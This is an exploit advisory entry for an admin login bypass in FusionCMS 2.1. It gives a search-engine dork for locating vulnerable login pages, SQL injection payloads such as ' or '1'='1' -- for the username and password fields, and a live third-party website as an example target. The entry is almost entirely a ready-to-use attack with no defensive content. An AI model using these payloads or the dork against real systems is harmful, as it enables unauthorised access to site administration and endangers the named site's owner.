#################################################################### # Exploit Title: Fusioncms 2.1 Admin Panel Bypass # Dork: /cmsadmin/login.php intext: ::Administration Login:: # Date: 29-01-2019 # Exploit Author: AtakBey,SecreTTeaM # Vendor Homepage: https://github.com/Desch/FusionCMS # Software Link: https://github.com/Desch/FusionCMS # Version: 2.1.0 # Category: Webapps # Tested on: Linux,Windows # CVE: N/A #################################################################### # Search Engine Bing.com # Benutzername: ' or '1'='1' -- ' ~ ' or '1'='1' ({ ' ~ ' or '1'='1' /* # Passwort: ' or '1'='1' -- ' ~ ' or '1'='1' ({ ' ~ ' or '1'='1' /* # ScreenShot: https://i.hizliresim.com/AD1PY0.png # Example Panel : https://www.scheinerwein.at/cmsadmin/login.php ####################################################################